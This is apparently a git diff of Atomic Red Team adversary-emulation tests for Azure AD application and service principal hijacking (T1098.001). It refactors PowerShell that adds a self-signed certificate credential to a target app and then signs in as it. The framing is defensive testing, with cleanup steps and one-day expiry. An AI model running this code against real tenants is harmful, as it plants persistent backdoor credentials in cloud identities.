diff --git a/atomics/Indexes/azure-ad-index.yaml b/atomics/Indexes/azure-ad-index.yaml index 43a59236..e3f59826 100644 --- a/atomics/Indexes/azure-ad-index.yaml +++ b/atomics/Indexes/azure-ad-index.yaml @@ -37535,14 +37535,6 @@ persistence: description: Name of the targeted service principal type: string default: SuperSP - certificate_password: - description: Password of the new certificate - type: string - default: Passw0rd - path_to_cert: - description: Path of the new certificate, locally stored - type: string - default: "$env:TEMP" dependency_executor_name: powershell dependencies: - description: 'AzureAD module must be installed. @@ -37566,21 +37558,18 @@ persistence: if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit } # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long - $certNotAfter = (Get-Date).AddDays(2) $credNotAfter = (Get-Date).AddDays(1) - $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint - Write-Host "Generated certificate ""$thumb""" - $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText - Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd > $null + $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry - $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd) + $cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) + Write-Host "Generated certificate ""$($cert.Thumbprint)""" New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter Start-Sleep -s 30 $tenant = Get-AzureADTenantDetail - $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb + $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" Write-Host "End of Hijacking" cleanup_command: "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord @@ -37593,8 +37582,7 @@ persistence: -eq \"AtomicTest\") {\n Write-Host \"Removed $($cred.KeyId) key from SP\"\n Remove-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My - | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{service_principal_name}.pfx\" - -ErrorAction Ignore\n" + | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\n" name: powershell elevation_required: false - name: Azure AD Application Hijacking - App Registration @@ -37618,14 +37606,6 @@ persistence: description: Name of the targeted application type: string default: SuperApp - certificate_password: - description: Password of the new certificate - type: string - default: Passw0rd - path_to_cert: - description: Path of the new certificate, locally stored - type: string - default: "$env:TEMP" dependency_executor_name: powershell dependencies: - description: 'AzureAD module must be installed. @@ -37649,21 +37629,18 @@ persistence: if ($app -eq $null) { Write-Warning "Application not found"; exit } # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long - $certNotAfter = (Get-Date).AddDays(2) $credNotAfter = (Get-Date).AddDays(1) - $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint - Write-Host "Generated certificate ""$thumb""" - $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText - Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd > $null + $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry - $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd) + $cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) + Write-Host "Generated certificate ""$($cert.Thumbprint)""" New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter Start-Sleep -s 30 $tenant = Get-AzureADTenantDetail - $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb + $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $cert.Thumbprint Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" Write-Host "End of Hijacking" cleanup_command: "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord @@ -37676,8 +37653,7 @@ persistence: -eq \"AtomicTest\") {\n Write-Host \"Removed $($cred.KeyId) key from application\"\n Remove-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My - | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{application_name}.pfx\" - -ErrorAction Ignore\n" + | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\n" name: powershell elevation_required: false T1053.004: diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index d7b4d4e8..b8224d2f 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -62806,14 +62806,6 @@ persistence: description: Name of the targeted service principal type: string default: SuperSP - certificate_password: - description: Password of the new certificate - type: string - default: Passw0rd - path_to_cert: - description: Path of the new certificate, locally stored - type: string - default: "$env:TEMP" dependency_executor_name: powershell dependencies: - description: 'AzureAD module must be installed. @@ -62837,21 +62829,18 @@ persistence: if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit } # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long - $certNotAfter = (Get-Date).AddDays(2) $credNotAfter = (Get-Date).AddDays(1) - $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint - Write-Host "Generated certificate ""$thumb""" - $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText - Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd > $null + $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry - $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd) + $cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) + Write-Host "Generated certificate ""$($cert.Thumbprint)""" New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter Start-Sleep -s 30 $tenant = Get-AzureADTenantDetail - $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb + $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" Write-Host "End of Hijacking" cleanup_command: "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord @@ -62864,8 +62853,7 @@ persistence: -eq \"AtomicTest\") {\n Write-Host \"Removed $($cred.KeyId) key from SP\"\n Remove-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My - | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{service_principal_name}.pfx\" - -ErrorAction Ignore\n" + | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\n" name: powershell elevation_required: false - name: Azure AD Application Hijacking - App Registration @@ -62889,14 +62877,6 @@ persistence: description: Name of the targeted application type: string default: SuperApp - certificate_password: - description: Password of the new certificate - type: string - default: Passw0rd - path_to_cert: - description: Path of the new certificate, locally stored - type: string - default: "$env:TEMP" dependency_executor_name: powershell dependencies: - description: 'AzureAD module must be installed. @@ -62920,21 +62900,18 @@ persistence: if ($app -eq $null) { Write-Warning "Application not found"; exit } # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long - $certNotAfter = (Get-Date).AddDays(2) $credNotAfter = (Get-Date).AddDays(1) - $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint - Write-Host "Generated certificate ""$thumb""" - $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText - Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd > $null + $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry - $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd) + $cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) + Write-Host "Generated certificate ""$($cert.Thumbprint)""" New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter Start-Sleep -s 30 $tenant = Get-AzureADTenantDetail - $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb + $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $cert.Thumbprint Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" Write-Host "End of Hijacking" cleanup_command: "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord @@ -62947,8 +62924,7 @@ persistence: -eq \"AtomicTest\") {\n Write-Host \"Removed $($cred.KeyId) key from application\"\n Remove-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My - | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{application_name}.pfx\" - -ErrorAction Ignore\n" + | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\n" name: powershell elevation_required: false - name: AWS - Create Access Key and Secret Key diff --git a/atomics/T1098.001/T1098.001.md b/atomics/T1098.001/T1098.001.md index b1150539..1eb42e11 100644 --- a/atomics/T1098.001/T1098.001.md +++ b/atomics/T1098.001/T1098.001.md @@ -42,8 +42,6 @@ An account with high-enough Azure AD privileges is needed, such as Global Admini | username | Azure AD username | string | jonh@contoso.com| | password | Azure AD password | string | p4sswd| | service_principal_name | Name of the targeted service principal | string | SuperSP| -| certificate_password | Password of the new certificate | string | Passw0rd| -| path_to_cert | Path of the new certificate, locally stored | string | $env:TEMP| #### Attack Commands: Run with `powershell`! @@ -59,21 +57,18 @@ $sp = Get-AzureADServicePrincipal -SearchString "#{service_principal_name}" | Se if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit } # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long -$certNotAfter = (Get-Date).AddDays(2) $credNotAfter = (Get-Date).AddDays(1) -$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint -Write-Host "Generated certificate ""$thumb""" -$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText -Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd > $null +$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry -$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd) +$cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) +Write-Host "Generated certificate ""$($cert.Thumbprint)""" New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter Start-Sleep -s 30 $tenant = Get-AzureADTenantDetail -$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb +$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" Write-Host "End of Hijacking" ``` @@ -94,7 +89,6 @@ foreach ($cred in $credz) { } } Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item -rm "#{path_to_cert}\#{service_principal_name}.pfx" -ErrorAction Ignore ``` @@ -136,8 +130,6 @@ An account with high-enough Azure AD privileges is needed, such as Global Admini | username | Azure AD username | string | jonh@contoso.com| | password | Azure AD password | string | p4sswd| | application_name | Name of the targeted application | string | SuperApp| -| certificate_password | Password of the new certificate | string | Passw0rd| -| path_to_cert | Path of the new certificate, locally stored | string | $env:TEMP| #### Attack Commands: Run with `powershell`! @@ -153,21 +145,18 @@ $app = Get-AzureADApplication -SearchString "#{application_name}" | Select-Objec if ($app -eq $null) { Write-Warning "Application not found"; exit } # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long -$certNotAfter = (Get-Date).AddDays(2) $credNotAfter = (Get-Date).AddDays(1) -$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint -Write-Host "Generated certificate ""$thumb""" -$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText -Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd > $null +$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry -$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd) +$cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) +Write-Host "Generated certificate ""$($cert.Thumbprint)""" New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter Start-Sleep -s 30 $tenant = Get-AzureADTenantDetail -$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb +$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $cert.Thumbprint Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" Write-Host "End of Hijacking" ``` @@ -188,7 +177,6 @@ foreach ($cred in $credz) { } } Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item -rm "#{path_to_cert}\#{application_name}.pfx" -ErrorAction Ignore ``` diff --git a/atomics/T1098.001/T1098.001.yaml b/atomics/T1098.001/T1098.001.yaml index b203d66d..ff5c5d8d 100644 --- a/atomics/T1098.001/T1098.001.yaml +++ b/atomics/T1098.001/T1098.001.yaml @@ -22,14 +22,6 @@ atomic_tests: description: Name of the targeted service principal type: string default: SuperSP - certificate_password: - description: Password of the new certificate - type: string - default: Passw0rd - path_to_cert: - description: Path of the new certificate, locally stored - type: string - default: $env:TEMP dependency_executor_name: powershell dependencies: - description: | @@ -49,21 +41,18 @@ atomic_tests: if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit } # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long - $certNotAfter = (Get-Date).AddDays(2) $credNotAfter = (Get-Date).AddDays(1) - $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint - Write-Host "Generated certificate ""$thumb""" - $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText - Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd > $null + $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry - $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd) + $cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) + Write-Host "Generated certificate ""$($cert.Thumbprint)""" New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter Start-Sleep -s 30 $tenant = Get-AzureADTenantDetail - $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb + $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" Write-Host "End of Hijacking" @@ -82,7 +71,6 @@ atomic_tests: } } Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item - rm "#{path_to_cert}\#{service_principal_name}.pfx" -ErrorAction Ignore name: powershell elevation_required: false @@ -107,14 +95,6 @@ atomic_tests: description: Name of the targeted application type: string default: SuperApp - certificate_password: - description: Password of the new certificate - type: string - default: Passw0rd - path_to_cert: - description: Path of the new certificate, locally stored - type: string - default: $env:TEMP dependency_executor_name: powershell dependencies: - description: | @@ -134,21 +114,18 @@ atomic_tests: if ($app -eq $null) { Write-Warning "Application not found"; exit } # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long - $certNotAfter = (Get-Date).AddDays(2) $credNotAfter = (Get-Date).AddDays(1) - $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint - Write-Host "Generated certificate ""$thumb""" - $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText - Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd > $null + $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry - $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd) + $cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) + Write-Host "Generated certificate ""$($cert.Thumbprint)""" New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter Start-Sleep -s 30 $tenant = Get-AzureADTenantDetail - $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb + $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $cert.Thumbprint Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" Write-Host "End of Hijacking" cleanup_command: | @@ -166,7 +143,6 @@ atomic_tests: } } Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item - rm "#{path_to_cert}\#{application_name}.pfx" -ErrorAction Ignore name: powershell elevation_required: false - name: AWS - Create Access Key and Secret Key